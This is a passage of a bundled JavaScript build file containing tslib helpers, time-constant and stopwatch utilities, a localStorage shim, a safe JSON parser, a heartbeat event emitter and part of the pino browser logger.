module.exports.defineProperties = $94c1f52609770e02$var$defineProperties;

});

parcelRequire.register("9EePZ", function(module, exports) {
"use strict";
Object.defineProperty(module.exports, "__esModule", {
    value: true
});

var $7WQrb = parcelRequire("7WQrb");

$7WQrb.__exportStar((parcelRequire("fUPCt")), module.exports);

$7WQrb.__exportStar((parcelRequire("3NXE9")), module.exports);

});
parcelRequire.register("7WQrb", function(module, exports) {

$parcel$export(module.exports, "__awaiter", () => $5c96a02c592fcff1$export$1050f835b63b671e);
$parcel$export(module.exports, "__exportStar", () => $5c96a02c592fcff1$export$f33643c0debef087);
$parcel$export(module.exports, "__importDefault", () => $5c96a02c592fcff1$export$da59b14a69baef04);
/*! *****************************************************************************
Copyright (c) Microsoft Corporation.

Permission to use, copy, modify, and/or distribute this software for any
purpose with or without fee is hereby granted.

THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH
REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,
INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR
OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
PERFORMANCE OF THIS SOFTWARE.
***************************************************************************** */ /* global Reflect, Promise */ var $5c96a02c592fcff1$var$extendStatics = function(d, b) {
    $5c96a02c592fcff1$var$extendStatics = Object.setPrototypeOf || ({
        __proto__: []
    }) instanceof Array && function(d, b) {
        d.__proto__ = b;
    } || function(d, b) {
        for(var p in b)if (b.hasOwnProperty(p)) d[p] = b[p];
    };
    return $5c96a02c592fcff1$var$extendStatics(d, b);
};
function $5c96a02c592fcff1$export$a8ba968b8961cb8a(d, b) {
    $5c96a02c592fcff1$var$extendStatics(d, b);
    function __() {
        this.constructor = d;
    }
    d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __());
}
var $5c96a02c592fcff1$export$18ce0697a983be9b = function() {
    $5c96a02c592fcff1$export$18ce0697a983be9b = Object.assign || function __assign(t) {
        for(var s, i = 1, n = arguments.length; i < n; i++){
            s = arguments[i];
            for(var p in s)if (Object.prototype.hasOwnProperty.call(s, p)) t[p] = s[p];
        }
        return t;
    };
    return $5c96a02c592fcff1$export$18ce0697a983be9b.apply(this, arguments);
};
function $5c96a02c592fcff1$export$3c9a16f847548506(s, e) {
    var t = {};
    for(var p in s)if (Object.prototype.hasOwnProperty.call(s, p) && e.indexOf(p) < 0) t[p] = s[p];
    if (s != null && typeof Object.getOwnPropertySymbols === "function") {
        for(var i = 0, p = Object.getOwnPropertySymbols(s); i < p.length; i++)if (e.indexOf(p[i]) < 0 && Object.prototype.propertyIsEnumerable.call(s, p[i])) t[p[i]] = s[p[i]];
    }
    return t;
}
function $5c96a02c592fcff1$export$29e00dfd3077644b(decorators, target, key, desc) {
    var c = arguments.length, r = c < 3 ? target : desc === null ? desc = Object.getOwnPropertyDescriptor(target, key) : desc, d;
    if (typeof Reflect === "object" && typeof Reflect.decorate === "function") r = Reflect.decorate(decorators, target, key, desc);
    else for(var i = decorators.length - 1; i >= 0; i--)if (d = decorators[i]) r = (c < 3 ? d(r) : c > 3 ? d(target, key, r) : d(target, key)) || r;
    return c > 3 && r && Object.defineProperty(target, key, r), r;
}
function $5c96a02c592fcff1$export$d5ad3fd78186038f(paramIndex, decorator) {
    return function(target, key) {
        decorator(target, key, paramIndex);
    };
}
function $5c96a02c592fcff1$export$f1db080c865becb9(metadataKey, metadataValue) {
    if (typeof Reflect === "object" && typeof Reflect.metadata === "function") return Reflect.metadata(metadataKey, metadataValue);
}
function $5c96a02c592fcff1$export$1050f835b63b671e(thisArg, _arguments, P, generator) {
    function adopt(value) {
        return value instanceof P ? value : new P(function(resolve) {
            resolve(value);
        });
    }
    return new (P || (P = Promise))(function(resolve, reject) {
        function fulfilled(value) {
            try {
                step(generator.next(value));
            } catch (e) {
                reject(e);
            }
        }
        function rejected(value) {
            try {
                step(generator["throw"](value));
            } catch (e) {
                reject(e);
            }
        }
        function step(result) {
            result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected);
        }
        step((generator = generator.apply(thisArg, _arguments || [])).next());
    });
}
function $5c96a02c592fcff1$export$67ebef60e6f28a6(thisArg, body) {
    var _ = {
        label: 0,
        sent: function() {
            if (t[0] & 1) throw t[1];
            return t[1];
        },
        trys: [],
        ops: []
    }, f, y, t, g;
    return g = {
        next: verb(0),
        "throw": verb(1),
        "return": verb(2)
    }, typeof Symbol === "function" && (g[Symbol.iterator] = function() {
        return this;
    }), g;
    function verb(n) {
        return function(v) {
            return step([
                n,
                v
            ]);
        };
    }
    function step(op) {
        if (f) throw new TypeError("Generator is already executing.");
        while(_)try {
            if (f = 1, y && (t = op[0] & 2 ? y["return"] : op[0] ? y["throw"] || ((t = y["return"]) && t.call(y), 0) : y.next) && !(t = t.call(y, op[1])).done) return t;
            if (y = 0, t) op = [
                op[0] & 2,
                t.value
            ];
            switch(op[0]){
                case 0:
                case 1:
                    t = op;
                    break;
                case 4:
                    _.label++;
                    return {
                        value: op[1],
                        done: false
                    };
                case 5:
                    _.label++;
                    y = op[1];
                    op = [
                        0
                    ];
                    continue;
                case 7:
                    op = _.ops.pop();
                    _.trys.pop();
                    continue;
                default:
                    if (!(t = _.trys, t = t.length > 0 && t[t.length - 1]) && (op[0] === 6 || op[0] === 2)) {
                        _ = 0;
                        continue;
                    }
                    if (op[0] === 3 && (!t || op[1] > t[0] && op[1] < t[3])) {
                        _.label = op[1];
                        break;
                    }
                    if (op[0] === 6 && _.label < t[1]) {
                        _.label = t[1];
                        t = op;
                        break;
                    }
                    if (t && _.label < t[2]) {
                        _.label = t[2];
                        _.ops.push(op);
                        break;
                    }
                    if (t[2]) _.ops.pop();
                    _.trys.pop();
                    continue;
            }
            op = body.call(thisArg, _);
        } catch (e) {
            op = [
                6,
                e
            ];
            y = 0;
        } finally{
            f = t = 0;
        }
        if (op[0] & 5) throw op[1];
        return {
            value: op[0] ? op[1] : void 0,
            done: true
        };
    }
}
function $5c96a02c592fcff1$export$45d3717a4c69092e(o, m, k, k2) {
    if (k2 === undefined) k2 = k;
    o[k2] = m[k];
}
function $5c96a02c592fcff1$export$f33643c0debef087(m, exports) {
    for(var p in m)if (p !== "default" && !exports.hasOwnProperty(p)) exports[p] = m[p];
}
function $5c96a02c592fcff1$export$19a8beecd37a4c45(o) {
    var s = typeof Symbol === "function" && Symbol.iterator, m = s && o[s], i = 0;
    if (m) return m.call(o);
    if (o && typeof o.length === "number") return {
        next: function() {
            if (o && i >= o.length) o = void 0;
            return {
                value: o && o[i++],
                done: !o
            };
        }
    };
    throw new TypeError(s ? "Object is not iterable." : "Symbol.iterator is not defined.");
}
function $5c96a02c592fcff1$export$8d051b38c9118094(o, n) {
    var m = typeof Symbol === "function" && o[Symbol.iterator];
    if (!m) return o;
    var i = m.call(o), r, ar = [], e;
    try {
        while((n === void 0 || n-- > 0) && !(r = i.next()).done)ar.push(r.value);
    } catch (error) {
        e = {
            error: error
        };
    } finally{
        try {
            if (r && !r.done && (m = i["return"])) m.call(i);
        } finally{
            if (e) throw e.error;
        }
    }
    return ar;
}
function $5c96a02c592fcff1$export$afc72e2116322959() {
    for(var ar = [], i = 0; i < arguments.length; i++)ar = ar.concat($5c96a02c592fcff1$export$8d051b38c9118094(arguments[i]));
    return ar;
}
function $5c96a02c592fcff1$export$6388937ca91ccae8() {
    for(var s = 0, i = 0, il = arguments.length; i < il; i++)s += arguments[i].length;
    for(var r = Array(s), k = 0, i = 0; i < il; i++)for(var a = arguments[i], j = 0, jl = a.length; j < jl; j++, k++)r[k] = a[j];
    return r;
}
function $5c96a02c592fcff1$export$10c90e4f7922046c(v) {
    return this instanceof $5c96a02c592fcff1$export$10c90e4f7922046c ? (this.v = v, this) : new $5c96a02c592fcff1$export$10c90e4f7922046c(v);
}
function $5c96a02c592fcff1$export$e427f37a30a4de9b(thisArg, _arguments, generator) {
    if (!Symbol.asyncIterator) throw new TypeError("Symbol.asyncIterator is not defined.");
    var g = generator.apply(thisArg, _arguments || []), i, q = [];
    return i = {}, verb("next"), verb("throw"), verb("return"), i[Symbol.asyncIterator] = function() {
        return this;
    }, i;
    function verb(n) {
        if (g[n]) i[n] = function(v) {
            return new Promise(function(a, b) {
                q.push([
                    n,
                    v,
                    a,
                    b
                ]) > 1 || resume(n, v);
            });
        };
    }
    function resume(n, v) {
        try {
            step(g[n](v));
        } catch (e) {
            settle(q[0][3], e);
        }
    }
    function step(r) {
        r.value instanceof $5c96a02c592fcff1$export$10c90e4f7922046c ? Promise.resolve(r.value.v).then(fulfill, reject) : settle(q[0][2], r);
    }
    function fulfill(value) {
        resume("next", value);
    }
    function reject(value) {
        resume("throw", value);
    }
    function settle(f, v) {
        if (f(v), q.shift(), q.length) resume(q[0][0], q[0][1]);
    }
}
function $5c96a02c592fcff1$export$bbd80228419bb833(o) {
    var i, p;
    return i = {}, verb("next"), verb("throw", function(e) {
        throw e;
    }), verb("return"), i[Symbol.iterator] = function() {
        return this;
    }, i;
    function verb(n, f) {
        i[n] = o[n] ? function(v) {
            return (p = !p) ? {
                value: $5c96a02c592fcff1$export$10c90e4f7922046c(o[n](v)),
                done: n === "return"
            } : f ? f(v) : v;
        } : f;
    }
}
function $5c96a02c592fcff1$export$e3b29a3d6162315f(o) {
    if (!Symbol.asyncIterator) throw new TypeError("Symbol.asyncIterator is not defined.");
    var m = o[Symbol.asyncIterator], i;
    return m ? m.call(o) : (o = typeof $5c96a02c592fcff1$export$19a8beecd37a4c45 === "function" ? $5c96a02c592fcff1$export$19a8beecd37a4c45(o) : o[Symbol.iterator](), i = {}, verb("next"), verb("throw"), verb("return"), i[Symbol.asyncIterator] = function() {
        return this;
    }, i);
    function verb(n) {
        i[n] = o[n] && function(v) {
            return new Promise(function(resolve, reject) {
                v = o[n](v), settle(resolve, reject, v.done, v.value);
            });
        };
    }
    function settle(resolve, reject, d, v) {
        Promise.resolve(v).then(function(v) {
            resolve({
                value: v,
                done: d
            });
        }, reject);
    }
}
function $5c96a02c592fcff1$export$4fb47efe1390b86f(cooked, raw) {
    if (Object.defineProperty) Object.defineProperty(cooked, "raw", {
        value: raw
    });
    else cooked.raw = raw;
    return cooked;
}
function $5c96a02c592fcff1$export$c21735bcef00d192(mod) {
    if (mod && mod.__esModule) return mod;
    var result = {};
    if (mod != null) {
        for(var k in mod)if (Object.hasOwnProperty.call(mod, k)) result[k] = mod[k];
    }
    result.default = mod;
    return result;
}
function $5c96a02c592fcff1$export$da59b14a69baef04(mod) {
    return mod && mod.__esModule ? mod : {
        default: mod
    };
}
function $5c96a02c592fcff1$export$d5dcaf168c640c35(receiver, privateMap) {
    if (!privateMap.has(receiver)) throw new TypeError("attempted to get private field on non-instance");
    return privateMap.get(receiver);
}
function $5c96a02c592fcff1$export$d40a35129aaff81f(receiver, privateMap, value) {
    if (!privateMap.has(receiver)) throw new TypeError("attempted to set private field on non-instance");
    privateMap.set(receiver, value);
    return value;
}

});

parcelRequire.register("fUPCt", function(module, exports) {
"use strict";
Object.defineProperty(module.exports, "__esModule", {
    value: true
});
module.exports.delay = void 0;
function $b964208cf0e7f449$var$delay(timeout) {
    return new Promise((resolve)=>{
        setTimeout(()=>{
            resolve(true);
        }, timeout);
    });
}
module.exports.delay = $b964208cf0e7f449$var$delay;

});

parcelRequire.register("3NXE9", function(module, exports) {
"use strict";
Object.defineProperty(module.exports, "__esModule", {
    value: true
});
module.exports.fromMiliseconds = module.exports.toMiliseconds = void 0;

var $2MWZl = parcelRequire("2MWZl");
function $2c543746c4e25c3a$var$toMiliseconds(seconds) {
    return seconds * $2MWZl.ONE_THOUSAND;
}
module.exports.toMiliseconds = $2c543746c4e25c3a$var$toMiliseconds;
function $2c543746c4e25c3a$var$fromMiliseconds(miliseconds) {
    return Math.floor(miliseconds / $2MWZl.ONE_THOUSAND);
}
module.exports.fromMiliseconds = $2c543746c4e25c3a$var$fromMiliseconds;

});
parcelRequire.register("2MWZl", function(module, exports) {
"use strict";
Object.defineProperty(module.exports, "__esModule", {
    value: true
});

var $7WQrb = parcelRequire("7WQrb");

$7WQrb.__exportStar((parcelRequire("lfr75")), module.exports);

$7WQrb.__exportStar((parcelRequire("1qmVT")), module.exports);

});
parcelRequire.register("lfr75", function(module, exports) {
"use strict";
Object.defineProperty(module.exports, "__esModule", {
    value: true
});
module.exports.ONE_THOUSAND = module.exports.ONE_HUNDRED = void 0;
module.exports.ONE_HUNDRED = 100;
module.exports.ONE_THOUSAND = 1000;

});

parcelRequire.register("1qmVT", function(module, exports) {
"use strict";
Object.defineProperty(module.exports, "__esModule", {
    value: true
});
module.exports.ONE_YEAR = module.exports.FOUR_WEEKS = module.exports.THREE_WEEKS = module.exports.TWO_WEEKS = module.exports.ONE_WEEK = module.exports.THIRTY_DAYS = module.exports.SEVEN_DAYS = module.exports.FIVE_DAYS = module.exports.THREE_DAYS = module.exports.ONE_DAY = module.exports.TWENTY_FOUR_HOURS = module.exports.TWELVE_HOURS = module.exports.SIX_HOURS = module.exports.THREE_HOURS = module.exports.ONE_HOUR = module.exports.SIXTY_MINUTES = module.exports.THIRTY_MINUTES = module.exports.TEN_MINUTES = module.exports.FIVE_MINUTES = module.exports.ONE_MINUTE = module.exports.SIXTY_SECONDS = module.exports.THIRTY_SECONDS = module.exports.TEN_SECONDS = module.exports.FIVE_SECONDS = module.exports.ONE_SECOND = void 0;
module.exports.ONE_SECOND = 1;
module.exports.FIVE_SECONDS = 5;
module.exports.TEN_SECONDS = 10;
module.exports.THIRTY_SECONDS = 30;
module.exports.SIXTY_SECONDS = 60;
module.exports.ONE_MINUTE = module.exports.SIXTY_SECONDS;
module.exports.FIVE_MINUTES = module.exports.ONE_MINUTE * 5;
module.exports.TEN_MINUTES = module.exports.ONE_MINUTE * 10;
module.exports.THIRTY_MINUTES = module.exports.ONE_MINUTE * 30;
module.exports.SIXTY_MINUTES = module.exports.ONE_MINUTE * 60;
module.exports.ONE_HOUR = module.exports.SIXTY_MINUTES;
module.exports.THREE_HOURS = module.exports.ONE_HOUR * 3;
module.exports.SIX_HOURS = module.exports.ONE_HOUR * 6;
module.exports.TWELVE_HOURS = module.exports.ONE_HOUR * 12;
module.exports.TWENTY_FOUR_HOURS = module.exports.ONE_HOUR * 24;
module.exports.ONE_DAY = module.exports.TWENTY_FOUR_HOURS;
module.exports.THREE_DAYS = module.exports.ONE_DAY * 3;
module.exports.FIVE_DAYS = module.exports.ONE_DAY * 5;
module.exports.SEVEN_DAYS = module.exports.ONE_DAY * 7;
module.exports.THIRTY_DAYS = module.exports.ONE_DAY * 30;
module.exports.ONE_WEEK = module.exports.SEVEN_DAYS;
module.exports.TWO_WEEKS = module.exports.ONE_WEEK * 2;
module.exports.THREE_WEEKS = module.exports.ONE_WEEK * 3;
module.exports.FOUR_WEEKS = module.exports.ONE_WEEK * 4;
module.exports.ONE_YEAR = module.exports.ONE_DAY * 365;

});




parcelRequire.register("iD73S", function(module, exports) {
"use strict";
Object.defineProperty(module.exports, "__esModule", {
    value: true
});
module.exports.Watch = void 0;
class $d90158c308dd266b$var$Watch {
    constructor(){
        this.timestamps = new Map();
    }
    start(label) {
        if (this.timestamps.has(label)) throw new Error(`Watch already started for label: ${label}`);
        this.timestamps.set(label, {
            started: Date.now()
        });
    }
    stop(label) {
        const timestamp = this.get(label);
        if (typeof timestamp.elapsed !== "undefined") throw new Error(`Watch already stopped for label: ${label}`);
        const elapsed = Date.now() - timestamp.started;
        this.timestamps.set(label, {
            started: timestamp.started,
            elapsed: elapsed
        });
    }
    get(label) {
        const timestamp = this.timestamps.get(label);
        if (typeof timestamp === "undefined") throw new Error(`No timestamp found for label: ${label}`);
        return timestamp;
    }
    elapsed(label) {
        const timestamp = this.get(label);
        const elapsed = timestamp.elapsed || Date.now() - timestamp.started;
        return elapsed;
    }
}
module.exports.Watch = $d90158c308dd266b$var$Watch;
module.exports.default = $d90158c308dd266b$var$Watch;

});

parcelRequire.register("dTXLC", function(module, exports) {
"use strict";
Object.defineProperty(module.exports, "__esModule", {
    value: true
});

var $7WQrb = parcelRequire("7WQrb");

$7WQrb.__exportStar((parcelRequire("b5rRE")), module.exports);

});
parcelRequire.register("b5rRE", function(module, exports) {
"use strict";
Object.defineProperty(module.exports, "__esModule", {
    value: true
});
module.exports.IWatch = void 0;
class $8125c6986ecca435$var$IWatch {
}
module.exports.IWatch = $8125c6986ecca435$var$IWatch;

});


parcelRequire.register("bKt7V", function(module, exports) {
"use strict";
(function() {
    "use strict";
    let db;
    function LocalStorage() {}
    db = LocalStorage;
    db.prototype.getItem = function(key) {
        if (this.hasOwnProperty(key)) return String(this[key]);
        return null;
    };
    db.prototype.setItem = function(key, val) {
        this[key] = String(val);
    };
    db.prototype.removeItem = function(key) {
        delete this[key];
    };
    db.prototype.clear = function() {
        const self = this;
        Object.keys(self).forEach(function(key) {
            self[key] = undefined;
            delete self[key];
        });
    };
    db.prototype.key = function(i) {
        i = i || 0;
        return Object.keys(this)[i];
    };
    db.prototype.__defineGetter__("length", function() {
        return Object.keys(this).length;
    });
    if (typeof $parcel$global !== "undefined" && $parcel$global.localStorage) module.exports = $parcel$global.localStorage;
    else if (typeof window !== "undefined" && window.localStorage) module.exports = window.localStorage;
    else module.exports = new LocalStorage();
})();

});

parcelRequire.register("57Lgo", function(module, exports) {
"use strict";
Object.defineProperty(module.exports, "__esModule", {
    value: true
});
module.exports.IKeyValueStorage = void 0;
class $3bb244b70aa66fad$var$IKeyValueStorage {
}
module.exports.IKeyValueStorage = $3bb244b70aa66fad$var$IKeyValueStorage;

});

parcelRequire.register("3ycQJ", function(module, exports) {
"use strict";
Object.defineProperty(module.exports, "__esModule", {
    value: true
});
module.exports.parseEntry = void 0;

var $lT07n = parcelRequire("lT07n");
function $295e83bbcb24cf7b$var$parseEntry(entry) {
    var _a;
    return [
        entry[0],
        $lT07n.safeJsonParse((_a = entry[1]) !== null && _a !== void 0 ? _a : "")
    ];
}
module.exports.parseEntry = $295e83bbcb24cf7b$var$parseEntry;

});
parcelRequire.register("lT07n", function(module, exports) {
"use strict";
Object.defineProperty(module.exports, "__esModule", {
    value: true
});
function $feeed37a0b619d8b$var$safeJsonParse(value) {
    if (typeof value !== "string") throw new Error(`Cannot safe json parse value of type ${typeof value}`);
    try {
        return JSON.parse(value);
    } catch (_a) {
        return value;
    }
}
module.exports.safeJsonParse = $feeed37a0b619d8b$var$safeJsonParse;
function $feeed37a0b619d8b$var$safeJsonStringify(value) {
    return typeof value === "string" ? value : JSON.stringify(value, (key, value)=>typeof value === "undefined" ? null : value);
}
module.exports.safeJsonStringify = $feeed37a0b619d8b$var$safeJsonStringify;

});


parcelRequire.register("48YDT", function(module, exports) {
"use strict";
Object.defineProperty(module.exports, "__esModule", {
    value: true
});
module.exports.HeartBeat = void 0;

var $7WQrb = parcelRequire("7WQrb");

var $7etJZ = parcelRequire("7etJZ");

var $aG48A = parcelRequire("aG48A");

var $5nu18 = parcelRequire("5nu18");

var $1nGZv = parcelRequire("1nGZv");
class $3046f31a17013644$var$HeartBeat extends $5nu18.IHeartBeat {
    constructor(opts){
        super(opts);
        this.events = new $7etJZ.EventEmitter();
        this.interval = $1nGZv.HEARTBEAT_INTERVAL;
        this.interval = (opts === null || opts === void 0 ? void 0 : opts.interval) || $1nGZv.HEARTBEAT_INTERVAL;
    }
    static init(opts) {
        return $7WQrb.__awaiter(this, void 0, void 0, function*() {
            const heartbeat = new $3046f31a17013644$var$HeartBeat(opts);
            yield heartbeat.init();
            return heartbeat;
        });
    }
    init() {
        return $7WQrb.__awaiter(this, void 0, void 0, function*() {
            yield this.initialize();
        });
    }
    stop() {
        clearInterval(this.intervalRef);
    }
    on(event, listener) {
        this.events.on(event, listener);
    }
    once(event, listener) {
        this.events.once(event, listener);
    }
    off(event, listener) {
        this.events.off(event, listener);
    }
    removeListener(event, listener) {
        this.events.removeListener(event, listener);
    }
    initialize() {
        return $7WQrb.__awaiter(this, void 0, void 0, function*() {
            this.intervalRef = setInterval(()=>this.pulse(), $aG48A.toMiliseconds(this.interval));
        });
    }
    pulse() {
        this.events.emit($1nGZv.HEARTBEAT_EVENTS.pulse);
    }
}
module.exports.HeartBeat = $3046f31a17013644$var$HeartBeat;

});
parcelRequire.register("aG48A", function(module, exports) {
"use strict";
Object.defineProperty(module.exports, "__esModule", {
    value: true
});

var $7WQrb = parcelRequire("7WQrb");

$7WQrb.__exportStar((parcelRequire("9EePZ")), module.exports);

$7WQrb.__exportStar((parcelRequire("iD73S")), module.exports);

$7WQrb.__exportStar((parcelRequire("dTXLC")), module.exports);

$7WQrb.__exportStar((parcelRequire("2MWZl")), module.exports);

});

parcelRequire.register("5nu18", function(module, exports) {
"use strict";
Object.defineProperty(module.exports, "__esModule", {
    value: true
});

var $7WQrb = parcelRequire("7WQrb");

$7WQrb.__exportStar((parcelRequire("bVfbs")), module.exports);

});
parcelRequire.register("bVfbs", function(module, exports) {
"use strict";
Object.defineProperty(module.exports, "__esModule", {
    value: true
});
module.exports.IHeartBeat = void 0;
parcelRequire("37EVq");
var $3VSyk = parcelRequire("3VSyk");
class $8ae0cbc8ca291b66$var$IHeartBeat extends $3VSyk.IEvents {
    constructor(opts){
        super();
    }
}
module.exports.IHeartBeat = $8ae0cbc8ca291b66$var$IHeartBeat;

});
parcelRequire.register("37EVq", function(module, exports) {
$parcel$export(module.exports, "IEvents", () => (parcelRequire("3VSyk")).IEvents);
parcelRequire("3VSyk");

});
parcelRequire.register("3VSyk", function(module, exports) {

$parcel$export(module.exports, "IEvents", () => $2dd102fe42a3c147$export$ab429ec7e240e546);
class $2dd102fe42a3c147$export$ab429ec7e240e546 {
}

});




parcelRequire.register("1nGZv", function(module, exports) {
"use strict";
Object.defineProperty(module.exports, "__esModule", {
    value: true
});

var $7WQrb = parcelRequire("7WQrb");

$7WQrb.__exportStar((parcelRequire("18uwn")), module.exports);

});
parcelRequire.register("18uwn", function(module, exports) {
"use strict";
Object.defineProperty(module.exports, "__esModule", {
    value: true
});
module.exports.HEARTBEAT_EVENTS = module.exports.HEARTBEAT_INTERVAL = void 0;

var $aG48A = parcelRequire("aG48A");
module.exports.HEARTBEAT_INTERVAL = $aG48A.FIVE_SECONDS;
module.exports.HEARTBEAT_EVENTS = {
    pulse: "heartbeat_pulse"
};

});



parcelRequire.register("kgxrf", function(module, exports) {
"use strict";

var $7h4xj = parcelRequire("7h4xj");
module.exports = $03ceb28a240053b3$var$pino;
const $03ceb28a240053b3$var$_console = $03ceb28a240053b3$var$pfGlobalThisOrFallback().console || {};
const $03ceb28a240053b3$var$stdSerializers = {
    mapHttpRequest: $03ceb28a240053b3$var$mock,
    mapHttpResponse: $03ceb28a240053b3$var$mock,
    wrapRequestSerializer: $03ceb28a240053b3$var$passthrough,
    wrapResponseSerializer: $03ceb28a240053b3$var$passthrough,
    wrapErrorSerializer: $03ceb28a240053b3$var$passthrough,
    req: $03ceb28a240053b3$var$mock,
    res: $03ceb28a240053b3$var$mock,
    err: $03ceb28a240053b3$var$asErrValue
};
function $03ceb28a240053b3$var$shouldSerialize(serialize, serializers) {
    if (Array.isArray(serialize)) {
        const hasToFilter = serialize.filter(function(k) {
            return k !== "!stdSerializers.err";
        });
        return hasToFilter;
    } else if (serialize === true) return Object.keys(serializers);
    return false;
}
function $03ceb28a240053b3$var$pino(opts) {
    opts = opts || {};
    opts.browser = opts.browser || {};
    const transmit = opts.browser.transmit;
    if (transmit && typeof transmit.send !== "function") throw Error("pino: transmit option must have a send function");
    const proto = opts.browser.write || $03ceb28a240053b3$var$_console;
    if (opts.browser.write) opts.browser.asObject = true;
    const serializers = opts.serializers || {};
    const serialize = $03ceb28a240053b3$var$shouldSerialize(opts.browser.serialize, serializers);
    let stdErrSerialize = opts.browser.serialize;
    if (Array.isArray(opts.browser.serialize) && opts.browser.serialize.indexOf("!stdSerializers.err") > -1) stdErrSerialize = false;
    const levels = [
        "error",
        "fatal",
        "warn",
        "info",
        "debug",
        "trace"
    ];
    if (typeof proto === "function") proto.error = proto.fatal = proto.warn = proto.info = proto.debug = proto.trace = proto;
    if (opts.enabled === false) opts.level = "silent";
    const level = opts.level || "info";
    const logger = Object.create(proto);
    if (!logger.log) logger.log = $03ceb28a240053b3$var$noop;
    Object.defineProperty(logger, "levelVal", {
        get: getLevelVal
    });
    Object.defineProperty(logger, "level", {
        get: getLevel,
        set: setLevel
    });
    const setOpts = {
        transmit: transmit,
        serialize: serialize,
        asObject: opts.browser.asObject,
        levels: levels,
        timestamp: $03ceb28a240053b3$var$getTimeFunction(opts)
    };
    logger.levels = $03ceb28a240053b3$var$pino.levels;
    logger.level = level;
    logger.setMaxListeners = logger.getMaxListeners = logger.emit = logger.addListener = logger.on = logger.prependListener = logger.once = logger.prependOnceListener = logger.removeListener = logger.removeAllListeners = logger.listeners = logger.listenerCount = logger.eventNames = logger.write = logger.flush = $03ceb28a240053b3$var$noop;
    logger.serializers = serializers;
    logger._serialize = serialize;
    logger._stdErrSerialize = stdErrSerialize;
    logger.child = child;
    if (transmit) logger._logEvent = $03ceb28a240053b3$var$createLogEventShape();
    function getLevelVal() {
        return this.level === "silent" ? Infinity : this.levels.values[this.level];
    }
    function getLevel() {
        return this._level;
    }
    function setLevel(level) {
        if (level !== "silent" && !this.levels.values[level]) throw Error("unknown level " + level);
        this._level = level;
        $03ceb28a240053b3$var$set(setOpts, logger, "error", "log") // <-- must stay first
        ;
        $03ceb28a240053b3$var$set(setOpts, logger, "fatal", "error");
        $03ceb28a240053b3$var$set(setOpts, logger, "warn", "error");
        $03ceb28a240053b3$var$set(setOpts, logger, "info", "log");
        $03ceb28a240053b3$var$set(setOpts, logger, "debug", "log");
        $03ceb28a240053b3$var$set(setOpts, logger, "trace", "log");
    }
    function child(bindings, childOptions) {
        if (!bindings) throw new Error("missing bindings for child Pino");
        childOptions = childOptions || {};
        if (serialize && bindings.serializers) childOptions.serializers = bindings.serializers;
        const childOptionsSerializers = childOptions.serializers;
        if (serialize && childOptionsSerializers) {
            var childSerializers = Object.assign({}, serializers, childOptionsSerializers);
            var childSerialize = opts.browser.serialize === true ? Object.keys(childSerializers) : serialize;
            delete bindings.serializers;
            $03ceb28a240053b3$var$applySerializers([
                bindings
            ], childSerialize, childSerializers, this._stdErrSerialize);
        }
        function Child(parent) {
            this._childLevel = (parent._childLevel | 0) + 1;
            this.error = $03ceb28a240053b3$var$bind(parent, bindings, "error");
            this.fatal = $03ceb28a240053b3$var$bind(parent, bindings, "fatal");
            this.warn = $03ceb28a240053b3$var$bind(parent, bindings, "warn");
            this.info = $03ceb28a240053b3$var$bind(parent, bindings, "info");
            this.debug = $03ceb28a240053b3$var$bind(parent, bindings, "debug");
            this.trace = $03ceb28a240053b3$var$bind(parent, bindings, "trace");
            if (childSerializers) {
                this.serializers = childSerializers;
                this._serialize = childSerialize;
            }
            if (transmit) this._logEvent = $03ceb28a240053b3$var$createLogEventShape([].concat(parent._logEvent.bindings, bindings));
        }
        Child.prototype = this;
        return new Child(this);
    }
    return logger;
}
$03ceb28a240053b3$var$pino.levels = {
    values: {
        fatal: 60,
        error: 50,
        warn: 40,
        info: 30,
        debug: 20,
        trace: 10
    },
    labels: {
        10: "trace",
        20: "debug",
        30: "info",
        40: "warn",
        50: "error",
        60: "fatal"
    }
};
$03ceb28a240053b3$var$pino.stdSerializers = $03ceb28a240053b3$var$stdSerializers;
$03ceb28a240053b3$var$pino.stdTimeFunctions = Object.assign({}, {
    nullTime: $03ceb28a240053b3$var$nullTime,
    epochTime: $03ceb28a240053b3$var$epochTime,
    unixTime: $03ceb28a240053b3$var$unixTime,
    isoTime: $03ceb28a240053b3$var$isoTime
});
function $03ceb28a240053b3$var$set(opts, logger, level, fallback) {
    const proto = Object.getPrototypeOf(logger);
    logger[level] = logger.levelVal > logger.levels.values[level] ? $03ceb28a240053b3$var$noop : proto[level] ? proto[level] : $03ceb28a240053b3$var$_console[level] || $03ceb28a240053b3$var$_console[fallback] || $03ceb28a240053b3$var$noop;
    $03ceb28a240053b3$var$wrap(opts, logger, level);
}
function $03ceb28a240053b3$var$wrap(opts, logger, level) {
    if (!opts.transmit && logger[level] === $03ceb28a240053b3$var$noop) return;
    logger[level] = function(write) {
        return function LOG() {
            const ts = opts.timestamp();
            const args = new Array(arguments.length);
            const proto = Object.getPrototypeOf && Object.getPrototypeOf(this) === $03ceb28a240053b3$var$_console ? $03ceb28a240053b3$var$_console : this;
            for(var i = 0; i < args.length; i++)args[i] = arguments[i];
            if (opts.serialize && !opts.asObject) $03ceb28a240053b3$var$applySerializers(args, this._serialize, this.serializers, this._stdErrSerialize);
            if (opts.asObject) write.call(proto, $03ceb28a240053b3$var$asObject(this, level, args, ts));
            else write.apply(proto, args);
            if (opts.transmit) {
                const transmitLevel = opts.transmit.level || logger.level;
                const transmitValue = $03ceb28a240053b3$var$pino.levels.values[transmitLevel];
                const methodValue = $03ceb28a240053b3$var$pino.levels.values[level];
                if (methodValue < transmitValue) return;
                $03ceb28a240053b3$var$transmit(this, {
                    ts: ts,
                    methodLevel: level,
                    methodValue: methodValue,
                    transmitLevel: transmitLevel,
                    transmitValue: $03ceb28a240053b3$var$pino.levels.values[opts.transmit.level || logger.level],
                    send: opts.transmit.send,
                    val: logger.levelVal
                }, args);
            }
        };
    }(logger[level]);
}
function $03ceb28a240053b3$var$asObject(logger, level, args, ts) {
